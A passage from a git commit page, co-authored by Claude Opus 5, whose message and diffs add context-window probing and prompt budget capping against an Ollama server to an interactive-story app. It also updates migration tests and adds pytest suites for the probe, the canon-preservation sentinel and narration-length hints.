M11: what the server will actually read
The release-validation milestone, and the thing it had to settle first was whether any of the earlier evidence meant what it said. M8 measured a deployment enforcing a 4,096-token input window while the application budgeted 16,384. Every request returned 200. What Ollama does with the excess is drop the oldest tokens, and the oldest tokens here are the system block — the narrator's rules and the campaign canon. A hundred-turn certification against that server would have looked perfect and proved nothing, which is why this milestone could not begin with a hundred turns. So the application asks now. Ollama's window is a property of how a model was loaded rather than of the request — sending num_ctx is accepted, ignored, and worse, reloads the model at the server's own default — so the only honest move is to find out and then tell the truth about it. /api/ps reports what a resident model is being served with, /api/show what an unloaded one will load with, both on the same host inference already uses, through the same endpoint policy and the same TLS trust store. A verified window is a ceiling on the budget; an unverified one leaves the budget alone and is recorded as unverified in the turn's own provenance, so an old turn can be asked afterwards whether it was built against a checked window. There is no third behaviour, and in particular no hard-coded 4,096: a number the server did not say would be right on one machine and wrong on the next. The proof that this is doing something is a campaign whose canon sits at the front of the prompt, 120 turns of history, and a 4,096-token window. The canon is still there afterwards and the oldest history is gone. The same campaign built the old way produces a prompt more than twice the window — the defect, reproduced, so the fix is measured against it rather than asserted. Two defects the validation found on its own, and they are the same defect twice: something was true and nobody was told. A manual state correction of four changes with one bad reference applied three, returned 201, and said nothing — while recording the refusal on the audit row nobody reads. It came to light because the identity diagnostic's own fixture was refused that way and the whole run proceeded on a campaign with no scene, which would have read as a model failure. And the narration-length setting moved no number: brief, medium and long each became one English sentence, while the numeric hint the model actually reads was derived from the global reply cap and said the same thing for all three. Both now say what they did. The other two post-M8 findings are closed as well. The tab said AI D&D, which no document had ever claimed it did not; it says Interactive Story now, with the open campaign first, and the name is the owner's decision rather than a find-and-replace to something narrower than the engine. After an Undo the reader could not tell where they had landed; the control row now ends with "Moment 11 · later story ahead", from the server's own answer, in the word the transcript already uses, with none of head, branch or depth anywhere near it. The identity diagnostic exists and the root cause does not. That campaign was destroyed, so no cause can be established — what M11 owes the finding is something that can classify the next occurrence, and a diagnostic that makes only the judgements a program can honestly make: duplicate keys, shared names, protagonist drift, state and context disagreeing. Whether prose misattributed a line is left to a person reading it beside its prompt, because a regex cannot read dialogue and one that pretended to would produce exactly the confident wrong answer this finding is about. Its detectors are proved to fire against a planted second Alice. Two entities may still share a display name. That was checked first, as the finding asked, and left permitted: a mother and a daughter, or a stranger giving a false name, are ordinary fiction, and refusing them to guard against a model mistake would refuse the wrong thing. What was missing was that it happened silently. It is reported now. Evidence, not inference: a hundred accepted turns against a real narrator with genuine process restarts; a real browser against the built SPA; a container with no network at all; a campaign moved into a data directory that never existed. Each was discarded and re-run whenever the product changed under it, and the runs that were thrown away are listed in the report with the reason, along with ten defects in the harnesses themselves — because a harness that has only ever agreed with itself is not evidence, and two of M8's five harness defects were masking real ones. No dependency was added, removed or upgraded. No acceptance test was retired, relaxed or reclassified. M11 is implemented and verified; it is not accepted, and there is no release tag. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01Qyn3oRd4D6pi72nKBG725B
This commit is contained in:
co-authored by
Claude Opus 5
parent
1013c94eb1
commit
144406cd48
@@ -31,6 +31,8 @@ from sqlalchemy.engine import Engine
|
||||
# this case. It skips DDL that already ran, so the tree migrations run their
|
||||
# backfill against a schema that already has the columns.
|
||||
_UNDO: list[tuple[int, tuple[str, ...]]] = [
|
||||
# M11: the campaign's narration-length choice.
|
||||
(93, ("ALTER TABLE adventures DROP COLUMN narration_length",)),
|
||||
# Packed float32 vectors and the flag beside them.
|
||||
(39, ("ALTER TABLE memories DROP COLUMN embedded",)),
|
||||
(38, ("ALTER TABLE memories DROP COLUMN embedding_blob",)),
|
||||
|
||||
@@ -34,6 +34,9 @@ from app.routers import adventures
|
||||
from fakes import ScriptedProvider, state_block
|
||||
|
||||
M6_VERSION = 91
|
||||
#: The version M7's own migration introduced. Kept as the number M7 added
|
||||
#: rather than as "the newest version": M11 added 93, and a test that conflated
|
||||
#: the two would fail on every later migration while proving nothing about M7.
|
||||
M7_VERSION = 92
|
||||
|
||||
#: Everything M7 adds to the schema. Dropping all of it and rewinding the stamp
|
||||
@@ -127,7 +130,8 @@ def test_a_fresh_database_gets_every_m7_table_and_the_fts_index(client):
|
||||
for table in M7_TABLES:
|
||||
assert table in tables
|
||||
assert fts.TABLE in tables
|
||||
assert stamp() == migrations.LATEST_VERSION == M7_VERSION
|
||||
# Bootstrapping goes to the newest version, which is M7's or later.
|
||||
assert stamp() == migrations.LATEST_VERSION >= M7_VERSION
|
||||
|
||||
# And it works end to end on that fresh database.
|
||||
assert upload(client, "canon.md",
|
||||
@@ -199,7 +203,7 @@ def test_a_real_m6_database_migrates_and_keeps_everything_it_had(client):
|
||||
|
||||
migrations.bootstrap(engine)
|
||||
|
||||
assert stamp() == M7_VERSION
|
||||
assert stamp() == migrations.LATEST_VERSION >= M7_VERSION
|
||||
tables = set(inspect(engine).get_table_names())
|
||||
for table in M7_TABLES + (fts.TABLE,):
|
||||
assert table in tables, table
|
||||
@@ -265,7 +269,7 @@ def test_the_migration_is_idempotent(client):
|
||||
rows = len(db.execute(select(models.KnowledgeChunk)).scalars().all())
|
||||
|
||||
migrations.bootstrap(engine)
|
||||
assert stamp() == M7_VERSION
|
||||
assert stamp() == migrations.LATEST_VERSION >= M7_VERSION
|
||||
with SessionLocal() as db:
|
||||
assert len(db.execute(select(models.KnowledgeChunk)).scalars().all()) == rows
|
||||
assert len(client.get(f"/api/adventures/{client.adv_id}/knowledge").json()) == 1
|
||||
|
||||
@@ -243,9 +243,12 @@ def m9_database():
|
||||
|
||||
M10's only schema change is the `visual_profiles` table, so an M9-era file
|
||||
is exactly this: the current schema without that table, stamped at 92 — the
|
||||
version M9 ended on and, since M10 adds no migration, the version it still
|
||||
ends on. The campaign rows are written before the upgrade, because the claim
|
||||
under test is that they are still there afterwards.
|
||||
version M9 ended on, and the version an M10-era file still carries, because
|
||||
M10 added no migration of its own. Opening it brings it to whatever the
|
||||
current version is; M11 later added 93, which is why these tests compare
|
||||
against `LATEST_VERSION` rather than a literal. The campaign rows are
|
||||
written before the upgrade, because the claim under test is that they are
|
||||
still there afterwards.
|
||||
"""
|
||||
directory = tempfile.mkdtemp(prefix="m10-migrate-")
|
||||
path = Path(directory) / "campaign.db"
|
||||
@@ -283,12 +286,26 @@ def test_an_m9_database_gains_the_new_table_when_it_is_opened(m9_database):
|
||||
path, older, adv_id = m9_database
|
||||
assert _version(older) == 92
|
||||
migrations.bootstrap(older)
|
||||
assert _version(older) == migrations.LATEST_VERSION == 92
|
||||
assert _version(older) == migrations.LATEST_VERSION
|
||||
with older.begin() as conn:
|
||||
assert conn.execute(text("SELECT COUNT(*) FROM visual_profiles")).scalar() == 0
|
||||
assert "ix_visual_profiles_adventure_id" in _indexes(older)
|
||||
|
||||
|
||||
def test_no_migration_mentions_the_table_m10_added(m9_database):
|
||||
"""M10's actual claim, stated so a later migration cannot invalidate it.
|
||||
|
||||
The first version of this file expressed "M10 adds no migration" as
|
||||
`LATEST_VERSION == 92`, which stopped being true the moment M11 added a
|
||||
column to another table — a fact about M11 that says nothing about M10. The
|
||||
durable claim is that `visual_profiles` arrives through `create_all` and
|
||||
that no migration anywhere touches it.
|
||||
"""
|
||||
for _, sql in migrations.MIGRATIONS:
|
||||
body = sql if isinstance(sql, str) else " ".join(sql.values())
|
||||
assert "visual_profiles" not in body, body[:120]
|
||||
|
||||
|
||||
def test_the_campaign_that_was_already_there_is_untouched(m9_database):
|
||||
path, older, adv_id = m9_database
|
||||
migrations.bootstrap(older)
|
||||
@@ -310,9 +327,10 @@ def test_opening_the_database_repeatedly_is_a_no_op(m9_database):
|
||||
path, older, adv_id = m9_database
|
||||
migrations.bootstrap(older)
|
||||
after_first = _indexes(older)
|
||||
first_version = _version(older)
|
||||
for _ in range(2):
|
||||
migrations.bootstrap(older)
|
||||
assert _version(older) == 92
|
||||
assert _version(older) == first_version == migrations.LATEST_VERSION
|
||||
assert _indexes(older) == after_first
|
||||
with older.begin() as conn:
|
||||
assert conn.execute(text("SELECT COUNT(*) FROM adventures")).scalar() == 1
|
||||
@@ -365,7 +383,8 @@ def test_a_backup_of_the_upgraded_database_still_works(m9_database):
|
||||
"SELECT COUNT(*) FROM visual_profiles").fetchone()[0] == 0
|
||||
assert copy_db.execute(
|
||||
"SELECT title FROM adventures").fetchone()[0] == "An M9 campaign"
|
||||
assert copy_db.execute("PRAGMA user_version").fetchone()[0] == 92
|
||||
assert copy_db.execute("PRAGMA user_version").fetchone()[0] == (
|
||||
migrations.LATEST_VERSION)
|
||||
finally:
|
||||
result.path.unlink(missing_ok=True)
|
||||
|
||||
|
||||
@@ -0,0 +1,393 @@
|
||||
"""M11: the application must not silently budget more input than the server accepts.
|
||||
|
||||
This is the milestone's release blocker, and the failure it prevents is the
|
||||
quiet kind. M8 measured a reference deployment enforcing a **4,096**-token window
|
||||
while the application budgeted **16,384**. Every request returned HTTP 200. What
|
||||
the server did with the excess is the problem: `llama.cpp` drops the *oldest*
|
||||
tokens, and the oldest tokens here are the system block — the narrator's rules
|
||||
and the campaign canon. A 100-turn certification run against that server would
|
||||
have looked perfect and proved nothing.
|
||||
|
||||
So the tests below are in two halves.
|
||||
|
||||
**The probe** must find the real window, must refuse to guess when it cannot,
|
||||
and must be held to the same endpoint policy as inference — a window probe that
|
||||
could reach an address a turn may not would be a hole in ADR 011.
|
||||
|
||||
**The enforcement** is the half that matters: a verified window is a *ceiling*,
|
||||
and the prompt that comes out of the builder must physically fit inside it. The
|
||||
sentinel test is the one to read — a campaign whose canon sits at the front of
|
||||
the prompt, a history far too long to fit, and a small verified window. The
|
||||
canon must still be there afterwards. That is the difference between the
|
||||
application choosing what to drop and the server choosing.
|
||||
|
||||
python -m pytest tests/test_m11_context_window.py -v
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
|
||||
import httpx
|
||||
import pytest
|
||||
from fastapi import Depends
|
||||
from fastapi.testclient import TestClient
|
||||
|
||||
from app import auth, contextwindow, limits, models
|
||||
from app.context import builder
|
||||
from app.database import Base, SessionLocal, engine, get_db
|
||||
from app.main import app
|
||||
from app.routers import adventures
|
||||
|
||||
from fakes import ScriptedProvider
|
||||
|
||||
ENDPOINT = "http://127.0.0.1:11434/v1"
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _clear_window_cache():
|
||||
contextwindow.cache_clear()
|
||||
yield
|
||||
contextwindow.cache_clear()
|
||||
|
||||
|
||||
# ------------------------------------------------------------ the arithmetic
|
||||
|
||||
def test_the_native_api_sits_beside_the_openai_one():
|
||||
assert contextwindow.native_base("http://127.0.0.1:11434/v1") == "http://127.0.0.1:11434"
|
||||
assert contextwindow.native_base("https://box.local:59394/v1/") == "https://box.local:59394"
|
||||
# Not shaped like Ollama's endpoint: used as given rather than guessed at.
|
||||
assert contextwindow.native_base("http://127.0.0.1:8000") == "http://127.0.0.1:8000"
|
||||
|
||||
|
||||
def test_a_verified_window_is_a_ceiling():
|
||||
small = contextwindow.Window(4096, contextwindow.LOADED)
|
||||
assert contextwindow.effective_budget(16384, small) == 4096
|
||||
|
||||
|
||||
def test_a_smaller_configured_budget_still_wins():
|
||||
"""The reader asked for a shorter prompt. The ceiling does not lengthen it."""
|
||||
big = contextwindow.Window(32768, contextwindow.LOADED)
|
||||
assert contextwindow.effective_budget(8000, big) == 8000
|
||||
|
||||
|
||||
def test_an_unverified_window_changes_nothing():
|
||||
assert contextwindow.effective_budget(16384, contextwindow.UNVERIFIED) == 16384
|
||||
assert contextwindow.effective_budget(16384, None) == 16384
|
||||
|
||||
|
||||
# ----------------------------------------------------------------- the probe
|
||||
|
||||
class FakeOllama:
|
||||
"""Answers `/api/ps` and `/api/show` the way the real server does.
|
||||
|
||||
Built from the shapes a real Ollama 0.33 returned, recorded in the M11
|
||||
report: `/api/ps` carries `context_length` for a resident model, and
|
||||
`/api/show` carries a plain-text parameter block plus `model_info`.
|
||||
"""
|
||||
|
||||
def __init__(self, *, loaded=None, parameters=None, arch_ctx=32768,
|
||||
show_status=200, ps_status=200):
|
||||
self.loaded = loaded or {}
|
||||
self.parameters = parameters
|
||||
self.arch_ctx = arch_ctx
|
||||
self.show_status = show_status
|
||||
self.ps_status = ps_status
|
||||
self.seen: list[str] = []
|
||||
|
||||
def handler(self, request: httpx.Request) -> httpx.Response:
|
||||
self.seen.append(str(request.url))
|
||||
if request.url.path == "/api/ps":
|
||||
if self.ps_status != 200:
|
||||
return httpx.Response(self.ps_status)
|
||||
return httpx.Response(200, json={"models": [
|
||||
{"name": name, "model": name, "context_length": tokens}
|
||||
for name, tokens in self.loaded.items()
|
||||
]})
|
||||
if request.url.path == "/api/show":
|
||||
if self.show_status != 200:
|
||||
return httpx.Response(self.show_status, json={})
|
||||
body = {"model_info": {"qwen2.context_length": self.arch_ctx}}
|
||||
if self.parameters is not None:
|
||||
body["parameters"] = self.parameters
|
||||
return httpx.Response(200, json=body)
|
||||
return httpx.Response(404)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def server(monkeypatch):
|
||||
"""Installs a fake Ollama behind httpx, and hands the test the recorder."""
|
||||
holder = {}
|
||||
|
||||
def install(fake: FakeOllama):
|
||||
holder["fake"] = fake
|
||||
original = httpx.AsyncClient
|
||||
|
||||
def build(*args, **kwargs):
|
||||
kwargs.pop("verify", None)
|
||||
return original(*args, transport=httpx.MockTransport(fake.handler), **kwargs)
|
||||
|
||||
monkeypatch.setattr(contextwindow.httpx, "AsyncClient", build)
|
||||
return fake
|
||||
|
||||
return install
|
||||
|
||||
|
||||
def test_a_loaded_model_reports_the_window_it_is_being_served_with(server):
|
||||
fake = server(FakeOllama(loaded={"qwen2.5:3b-instruct": 4096}))
|
||||
window = asyncio.run(contextwindow.probe(ENDPOINT, "qwen2.5:3b-instruct"))
|
||||
assert window.tokens == 4096
|
||||
assert window.source == contextwindow.LOADED
|
||||
assert window.verified
|
||||
# Asked the running server first, because a resident model has already
|
||||
# settled the question.
|
||||
assert fake.seen[0].endswith("/api/ps")
|
||||
|
||||
|
||||
def test_an_unloaded_model_falls_back_to_what_it_will_load_with(server):
|
||||
server(FakeOllama(loaded={}, parameters="num_ctx 16384\n"))
|
||||
window = asyncio.run(contextwindow.probe(ENDPOINT, "qwen2.5:3b-instruct-16k"))
|
||||
assert (window.tokens, window.source) == (16384, contextwindow.PARAMETERS)
|
||||
assert window.model_max == 32768
|
||||
|
||||
|
||||
def test_a_model_with_no_num_ctx_is_unknown_rather_than_assumed(server):
|
||||
"""The case that caused the bug, and it must not be papered over.
|
||||
|
||||
The server will load this at *its* default — 4,096 with no VRAM — but the
|
||||
default is the server's business and is not in any answer it gave us.
|
||||
Reporting 4,096 here would be a guess that happens to be right on one
|
||||
machine, so this reports unknown and says why.
|
||||
"""
|
||||
server(FakeOllama(loaded={}, parameters=None))
|
||||
window = asyncio.run(contextwindow.probe(ENDPOINT, "qwen2.5:3b-instruct"))
|
||||
assert not window.verified
|
||||
assert "num_ctx" in window.detail
|
||||
assert window.model_max == 32768 # still useful: raising it is possible
|
||||
|
||||
|
||||
def test_the_declared_window_cannot_exceed_the_architecture(server):
|
||||
server(FakeOllama(loaded={}, parameters="num_ctx 999999\n", arch_ctx=32768))
|
||||
assert asyncio.run(contextwindow.probe(ENDPOINT, "m")).tokens == 32768
|
||||
|
||||
|
||||
def test_a_probe_obeys_the_same_endpoint_policy_as_inference():
|
||||
"""ADR 011 / H12. A probe is a request, and requests go where turns may go.
|
||||
|
||||
No transport is installed, so a probe that ignored the policy would attempt
|
||||
a real connection to a cloud host. It is refused before that.
|
||||
"""
|
||||
for url in ("https://api.openai.com/v1", "http://8.8.8.8:11434/v1",
|
||||
"https://replicate.com/v1"):
|
||||
window = asyncio.run(contextwindow.probe(url, "gpt-4"))
|
||||
assert not window.verified
|
||||
assert "not allowed" in window.detail
|
||||
|
||||
|
||||
def test_an_unreachable_server_is_unknown_not_an_exception():
|
||||
"""Offline is the ordinary case, and it must not cost a turn."""
|
||||
window = asyncio.run(contextwindow.probe("http://127.0.0.1:1/v1", "any"))
|
||||
assert not window.verified
|
||||
assert window.tokens is None
|
||||
|
||||
|
||||
def test_a_server_that_does_not_speak_ollama_is_unknown(server):
|
||||
server(FakeOllama(loaded={}, show_status=404, ps_status=404))
|
||||
assert not asyncio.run(contextwindow.probe(ENDPOINT, "m")).verified
|
||||
|
||||
|
||||
def test_the_answer_is_cached_so_it_costs_one_request_a_session(server):
|
||||
fake = server(FakeOllama(loaded={"m": 8192}))
|
||||
for _ in range(5):
|
||||
assert asyncio.run(contextwindow.probe(ENDPOINT, "m")).tokens == 8192
|
||||
assert len([u for u in fake.seen if u.endswith("/api/ps")]) == 1
|
||||
|
||||
|
||||
def test_changing_the_model_or_endpoint_forgets_what_was_learned(server):
|
||||
fake = server(FakeOllama(loaded={"m": 8192, "other": 2048}))
|
||||
assert asyncio.run(contextwindow.probe(ENDPOINT, "m")).tokens == 8192
|
||||
assert asyncio.run(contextwindow.probe(ENDPOINT, "other")).tokens == 2048
|
||||
contextwindow.cache_clear()
|
||||
assert asyncio.run(contextwindow.probe(ENDPOINT, "m")).tokens == 8192
|
||||
assert len([u for u in fake.seen if u.endswith("/api/ps")]) == 3
|
||||
|
||||
|
||||
# ----------------------------------------------------------- the enforcement
|
||||
|
||||
@pytest.fixture()
|
||||
def client(monkeypatch):
|
||||
Base.metadata.create_all(bind=engine)
|
||||
setup = SessionLocal()
|
||||
user = models.User(is_guest=False, email="m11cw@example.com")
|
||||
setup.add(user)
|
||||
setup.flush()
|
||||
setup.add(models.Settings(
|
||||
user_id=user.id, model="qwen2.5:3b-instruct", endpoint_url=ENDPOINT,
|
||||
embedding_model="", context_token_budget=16384, max_output_tokens=800,
|
||||
))
|
||||
adventure = models.Adventure(
|
||||
user_id=user.id, title="Windowed",
|
||||
# The real canon shape — a dict of rules — not a string. The first
|
||||
# version of this fixture passed a string, `_canon_section` correctly
|
||||
# ignored it, and the sentinel test failed against a product that was
|
||||
# behaving properly. Recorded in the M11 report as a harness defect.
|
||||
campaign_canon={"rules": [
|
||||
"The abbey seal has never been broken.",
|
||||
"The sealed crypt is named CANON-SENTINEL-VERITAS-4417.",
|
||||
]},
|
||||
)
|
||||
setup.add(adventure)
|
||||
setup.flush()
|
||||
setup.add(models.Action(
|
||||
adventure_id=adventure.id, type="start", text="Rain over Westhaven."))
|
||||
setup.commit()
|
||||
adv_id, user_id = adventure.id, user.id
|
||||
setup.close()
|
||||
|
||||
monkeypatch.setattr(limits, "check_row_cap", lambda *a, **k: None)
|
||||
monkeypatch.setattr(adventures.turns, "OpenAICompatibleProvider", ScriptedProvider)
|
||||
app.dependency_overrides[auth.get_current_user] = (
|
||||
lambda db=Depends(get_db): db.get(models.User, user_id)
|
||||
)
|
||||
test_client = TestClient(app)
|
||||
test_client.adv_id = adv_id
|
||||
try:
|
||||
yield test_client
|
||||
finally:
|
||||
app.dependency_overrides.clear()
|
||||
adventures.turns._active_turns.clear()
|
||||
Base.metadata.drop_all(bind=engine)
|
||||
|
||||
|
||||
def _long_story(adv_id, turns=120):
|
||||
"""A history far larger than any small window, written straight to the tree.
|
||||
|
||||
Written through the ORM rather than played, because what is under test is
|
||||
the builder's arithmetic against a big story, not the turn engine.
|
||||
"""
|
||||
from app import tree
|
||||
|
||||
with SessionLocal() as db:
|
||||
adventure = db.get(models.Adventure, adv_id)
|
||||
for i in range(turns):
|
||||
for kind, text in (
|
||||
("do", f"I search the {i}th chamber of the undercroft."),
|
||||
("ai", "The lantern gutters. " + ("Cold stone, and older dust. " * 40)),
|
||||
):
|
||||
action = models.Action(adventure_id=adv_id, type=kind, text=text)
|
||||
db.add(action)
|
||||
db.flush()
|
||||
tree.place_action(db, adventure, action)
|
||||
db.commit()
|
||||
|
||||
|
||||
def _report(client, window):
|
||||
"""Builds the prompt the way a turn would, with `window` as the server's."""
|
||||
with SessionLocal() as db:
|
||||
adventure = db.get(models.Adventure, client.adv_id)
|
||||
settings = db.query(models.Settings).first()
|
||||
return builder.build_context(adventure, settings, window=window)
|
||||
|
||||
|
||||
def test_a_small_verified_window_caps_the_budget(client):
|
||||
_long_story(client.adv_id, turns=60)
|
||||
_, _, report = _report(client, contextwindow.Window(4096, contextwindow.LOADED))
|
||||
assert report["tokens"]["budget"] == 4096
|
||||
assert report["tokens"]["configured_budget"] == 16384
|
||||
assert report["window"]["capped"] is True
|
||||
assert report["window"]["verified"] is True
|
||||
|
||||
|
||||
def test_the_prompt_physically_fits_inside_the_verified_window(client):
|
||||
"""The invariant, measured on the assembled text rather than on intent."""
|
||||
_long_story(client.adv_id, turns=60)
|
||||
system, story, report = _report(
|
||||
client, contextwindow.Window(4096, contextwindow.LOADED))
|
||||
total = builder.count_tokens(system) + builder.count_tokens(story)
|
||||
reserve = report["tokens"]["output_reserve"]
|
||||
assert total + reserve <= 4096, (total, reserve)
|
||||
assert report["tokens"]["total"] == total
|
||||
|
||||
|
||||
def test_the_canon_at_the_front_survives_a_window_far_too_small(client):
|
||||
"""The sentinel test: the application drops history, the server never gets to.
|
||||
|
||||
`llama.cpp` truncates from the *front*, so if the app over-budgets, the
|
||||
canon is what disappears. Here the story is 120 turns long and the window is
|
||||
4,096 tokens — an enormous overflow — and the canon sentinel must still be
|
||||
in the prompt, with the history cut instead.
|
||||
"""
|
||||
_long_story(client.adv_id, turns=120)
|
||||
system, story, report = _report(
|
||||
client, contextwindow.Window(4096, contextwindow.LOADED))
|
||||
assert "CANON-SENTINEL-VERITAS-4417" in system
|
||||
assert builder.count_tokens(system) + builder.count_tokens(story) <= 4096
|
||||
# And it is the history that gave way — the oldest of it, keeping the
|
||||
# newest, which is the choice the application is supposed to be making.
|
||||
assert report["history"]["included"] < report["history"]["total"] / 10
|
||||
assert "119th chamber" in story # the most recent turn survived
|
||||
assert "0th chamber" not in story # the oldest did not
|
||||
|
||||
|
||||
def test_without_the_cap_the_same_prompt_would_have_overflowed(client):
|
||||
"""Proof the test above is testing something: the defect, reproduced.
|
||||
|
||||
The same campaign, the same builder, no verified window — which is exactly
|
||||
what every build before M11 did — produces a prompt several times larger
|
||||
than the server would read. That is the prompt whose front the server would
|
||||
have silently eaten.
|
||||
"""
|
||||
_long_story(client.adv_id, turns=120)
|
||||
system, story, _ = _report(client, None)
|
||||
unbounded = builder.count_tokens(system) + builder.count_tokens(story)
|
||||
assert unbounded > 4096 * 2, unbounded
|
||||
|
||||
|
||||
def test_an_unverified_window_is_recorded_as_unverified(client):
|
||||
_, _, report = _report(client, contextwindow.UNVERIFIED)
|
||||
assert report["window"]["verified"] is False
|
||||
assert report["window"]["capped"] is False
|
||||
assert report["tokens"]["budget"] == 16384
|
||||
|
||||
|
||||
def test_a_window_too_small_for_the_protected_context_fails_with_advice(client):
|
||||
"""§32's graceful failure, with the M11 sentence added.
|
||||
|
||||
A 1,024-token server cannot hold the reply reserve plus the canon, and the
|
||||
honest answer is a refusal that says raising the *setting* will not help,
|
||||
because the setting is no longer what is binding.
|
||||
"""
|
||||
with pytest.raises(builder.ContextOverflow) as caught:
|
||||
_report(client, contextwindow.Window(1024, contextwindow.LOADED))
|
||||
message = str(caught.value)
|
||||
assert "1024" in message
|
||||
assert "load the model with a larger window" in message
|
||||
|
||||
|
||||
def test_a_turn_records_the_window_it_was_built_against(client, monkeypatch):
|
||||
"""End to end: the stored snapshot of a real turn carries the verdict.
|
||||
|
||||
This is what makes an old turn auditable — a reviewer can ask of any turn in
|
||||
the campaign whether it was built against a checked window, rather than
|
||||
inferring it from what the settings say today.
|
||||
"""
|
||||
async def verified(endpoint, model, use_cache=True):
|
||||
return contextwindow.Window(4096, contextwindow.LOADED, 32768, "fake")
|
||||
|
||||
monkeypatch.setattr(adventures.turns.contextwindow, "probe", verified)
|
||||
ScriptedProvider.replies = ["The crypt is still sealed."]
|
||||
response = client.post(f"/api/adventures/{client.adv_id}/actions",
|
||||
json={"type": "do", "text": "look at the seal"})
|
||||
assert response.status_code == 200, response.text[:300]
|
||||
|
||||
with SessionLocal() as db:
|
||||
from sqlalchemy.orm import undefer
|
||||
action = (
|
||||
db.query(models.Action)
|
||||
.filter(models.Action.adventure_id == client.adv_id,
|
||||
models.Action.type == "ai")
|
||||
.options(undefer(models.Action.context_snapshot))
|
||||
.order_by(models.Action.id.desc()).first()
|
||||
)
|
||||
snapshot = action.context_snapshot
|
||||
assert snapshot["window"]["verified"] is True
|
||||
assert snapshot["window"]["tokens"] == 4096
|
||||
assert snapshot["tokens"]["budget"] == 4096
|
||||
@@ -0,0 +1,358 @@
|
||||
"""M11: the post-M8 playtest findings, on the backend side.
|
||||
|
||||
Findings A and B are browser-only and are tested in `frontend/src/m11.test.jsx`.
|
||||
This file covers finding C, which is half a browser change and half a prompt
|
||||
change, and the structural fact finding D asks M11 to check first.
|
||||
|
||||
**Finding C, in one sentence:** the campaign's narration-length choice became an
|
||||
English sentence in the instructions and moved no number, while the numeric hint
|
||||
the model actually reads was derived from the *global* reply cap and therefore
|
||||
said the same thing — "must not exceed 506 words, and it should not stop short of
|
||||
about 177" — whether the reader chose brief, medium or long.
|
||||
|
||||
python -m pytest tests/test_m11_findings.py -v
|
||||
"""
|
||||
|
||||
import pytest
|
||||
from fastapi import Depends
|
||||
from fastapi.testclient import TestClient
|
||||
|
||||
from app import auth, bundle, limits, models
|
||||
from app.context import builder
|
||||
from app.database import Base, SessionLocal, engine, get_db
|
||||
from app.main import app
|
||||
from app.narrative import model as nmodel
|
||||
from app.routers import adventures
|
||||
|
||||
from fakes import ScriptedProvider
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def client(monkeypatch):
|
||||
Base.metadata.create_all(bind=engine)
|
||||
setup = SessionLocal()
|
||||
user = models.User(is_guest=False, email="m11f@example.com")
|
||||
setup.add(user)
|
||||
setup.flush()
|
||||
setup.add(models.Settings(
|
||||
user_id=user.id, model="test-model", embedding_model="",
|
||||
context_token_budget=16384, max_output_tokens=800,
|
||||
))
|
||||
setup.commit()
|
||||
user_id = user.id
|
||||
setup.close()
|
||||
monkeypatch.setattr(limits, "check_row_cap", lambda *a, **k: None)
|
||||
monkeypatch.setattr(adventures.turns, "OpenAICompatibleProvider", ScriptedProvider)
|
||||
app.dependency_overrides[auth.get_current_user] = (
|
||||
lambda db=Depends(get_db): db.get(models.User, user_id)
|
||||
)
|
||||
test_client = TestClient(app)
|
||||
try:
|
||||
yield test_client
|
||||
finally:
|
||||
app.dependency_overrides.clear()
|
||||
adventures.turns._active_turns.clear()
|
||||
Base.metadata.drop_all(bind=engine)
|
||||
|
||||
|
||||
def _campaign(client, **fields):
|
||||
body = {"title": "Length", "opening": "Rain over Westhaven."} | fields
|
||||
response = client.post("/api/adventures", json=body)
|
||||
assert response.status_code == 201, response.text[:300]
|
||||
return response.json()
|
||||
|
||||
|
||||
def _hint_for(length, cap=800):
|
||||
return builder.length_hint(cap, length)
|
||||
|
||||
|
||||
def _numbers(hint):
|
||||
import re
|
||||
return [int(n) for n in re.findall(r"\b(\d+)\b", hint)]
|
||||
|
||||
|
||||
# ------------------------------------------------ finding C: the defect itself
|
||||
|
||||
def test_the_three_lengths_no_longer_say_the_same_thing():
|
||||
"""The finding, as a test that would have failed before M11.
|
||||
|
||||
At the default 800-token cap every length produced the identical sentence.
|
||||
Now each produces a different ceiling, and they are ordered the way the
|
||||
words are.
|
||||
"""
|
||||
brief, medium, long = (_hint_for(x) for x in ("brief", "medium", "long"))
|
||||
assert brief != medium != long
|
||||
assert brief != long
|
||||
ceilings = [_numbers(h)[0] for h in (brief, medium, long)]
|
||||
assert ceilings == sorted(ceilings), ceilings
|
||||
assert len(set(ceilings)) == 3
|
||||
|
||||
|
||||
def test_a_campaign_with_no_preference_reads_exactly_as_it_did_before():
|
||||
"""No existing campaign's prompt changes under the migration.
|
||||
|
||||
The empty value is the pre-M11 behaviour, unchanged — which is what makes a
|
||||
backfill unnecessary rather than merely inconvenient.
|
||||
"""
|
||||
assert _hint_for("") == builder.length_hint(800)
|
||||
|
||||
|
||||
def test_the_reply_cap_still_wins_over_the_band():
|
||||
"""A long campaign on a small cap gets the cap's number, not the band's.
|
||||
|
||||
The cap is what the endpoint will actually emit, so a hint that asked for
|
||||
more would be asking for a truncated turn — and the state block is emitted
|
||||
last, so a truncated turn loses its state.
|
||||
"""
|
||||
long_on_small_cap = _hint_for("long", cap=300)
|
||||
assert _numbers(long_on_small_cap)[0] <= _numbers(builder.length_hint(300))[0]
|
||||
|
||||
|
||||
def test_the_band_narrows_rather_than_widens_the_cap():
|
||||
for length in ("brief", "medium", "long"):
|
||||
banded = _numbers(_hint_for(length, cap=800))[0]
|
||||
unbanded = _numbers(builder.length_hint(800))[0]
|
||||
assert banded <= unbanded, length
|
||||
|
||||
|
||||
def test_every_hint_still_protects_the_state_block():
|
||||
"""The invariant the old hint had, kept by the new one."""
|
||||
for length in ("", "brief", "medium", "long"):
|
||||
assert "state block" in _hint_for(length)
|
||||
|
||||
|
||||
def test_an_unknown_length_falls_back_rather_than_inventing_a_band():
|
||||
assert _hint_for("epic") == builder.length_hint(800)
|
||||
|
||||
|
||||
# ------------------------------------------- finding C: it reaches the prompt
|
||||
|
||||
def test_the_choice_is_stored_and_returned(client):
|
||||
campaign = _campaign(client, narration_length="brief")
|
||||
assert campaign["narration_length"] == "brief"
|
||||
assert client.get(f"/api/adventures/{campaign['id']}").json()[
|
||||
"narration_length"] == "brief"
|
||||
|
||||
|
||||
def test_the_choice_can_be_changed_afterwards(client):
|
||||
campaign = _campaign(client, narration_length="brief")
|
||||
updated = client.patch(f"/api/adventures/{campaign['id']}",
|
||||
json={"narration_length": "long"})
|
||||
assert updated.status_code == 200, updated.text[:300]
|
||||
